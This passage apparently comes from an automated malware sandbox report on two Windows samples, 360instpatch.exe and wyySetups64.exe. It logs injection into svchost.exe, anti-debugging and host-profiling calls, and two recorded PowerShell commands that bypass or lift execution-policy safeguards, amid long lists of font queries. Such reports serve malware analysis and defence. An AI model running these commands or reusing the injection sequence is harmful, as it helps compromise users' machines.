    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CDDE1EA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6CDDE1EA
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B94647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00B94647
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B9116F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00B9116F
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B918F6 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00B918F6

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_033777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,1_2_033777E0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe1_2_033777E0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe1_2_033777E0
    Source: C:\Users\user\Desktop\wyySetups64.exe Process created: C:\Users\user\AppData\Roaming\wyySetups64.exe "C:\Users\user\AppData\Roaming\wyySetups64.exe"
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
    Source: 360instpatch.exe, 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp, sites.dll.8.drBinary or memory string: gShell_traywnd*.*
    Source: wyySetups64.exe, 00000001.00000003.1901055660.0000000004412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min066656Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
    Source: wyySetups64.exe, 00000001.00000003.4113626803.0000000004475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min066656Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
    Source: 360instpatch.exeBinary or memory string: Shell_traywnd
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B165C0 cpuid 8_2_00B165C0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,1_2_03375430
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_00BA7AB2
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetLocaleInfoA,8_2_00BBC813
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,8_2_00BA7569
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,8_2_00BA7AEE
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_00BA7A4B
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetLocaleInfoA,8_2_6BF4C53B
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: GetLocaleInfoA,8_2_6CDF6445
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,8_2_6CDF60BA
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_6CDF607E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_6CDF6017
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,8_2_6CDF7C17
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Users\user\AppData\Local\Temp\{4E37D1B0-FC9E-4af1-8227-2DAA098CDF46}.tmp VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Users\user\AppData\Local\Temp\{D699128A-3414-4fdc-A2BD-B3D2CDE19B93}.tmp VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Users\user\AppData\Local\Temp\{9AE51E5B-D986-4b47-9A8E-7D0F888610BF}.tmp VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
